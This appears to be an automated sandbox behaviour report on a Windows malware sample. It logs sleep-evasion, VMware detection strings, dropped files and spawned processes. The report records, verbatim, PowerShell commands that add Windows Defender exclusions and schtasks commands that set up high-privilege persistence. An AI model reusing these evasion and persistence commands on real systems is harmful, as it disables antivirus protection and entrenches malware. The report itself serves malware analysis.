Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2194	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2562	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2378
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2598

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tdboTeDy.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MzWJdjDq.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EOeBPHNE.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UciiGfGr.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BKvCmawc.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fQNZqrBZ.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xcpeKNWo.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PCJszSHm.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\edFhLbSI.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oMZxvDXp.log	Jump to dropped file

Source: C:\Users\user\Desktop\0J5DzstGPi.exe TID: 6412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep count: 2477 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep count: 2194 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580	Thread sleep count: 2562 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 2573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep count: 2378 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672	Thread sleep count: 2598 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\0J5DzstGPi.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\0J5DzstGPi.exe TID: 3368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 3272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 3468	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe TID: 2316	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe TID: 5480	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe TID: 1432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe TID: 8132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\sihost.exe TID: 3412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\0J5DzstGPi.exe TID: 1020	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.2158771619.000000001B3C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: 0J5DzstGPi.exe, 00000000.00000002.1851904995.000000001B8C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\BY
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.2093159834.0000000012B4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: 0J5DzstGPi.exe, 00000000.00000002.1859957208.000000001C01B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}er
Source: 0J5DzstGPi.exe, 00000000.00000002.1860000770.000000001C03B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.2158771619.000000001B3D6000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000036.00000002.1971300908.0000022990077000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug
Source: C:\Recovery\sihost.exe	Process token adjusted: Debug
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Process token adjusted: Debug
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Process token adjusted: Debug
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe'	Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "steBCuuQsIefcKufvgYbRBCxKhPRs" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0J5DzstGPi0" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\0J5DzstGPi.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8C8.tmp" "c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Queries volume information: C:\Users\user\Desktop\0J5DzstGPi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
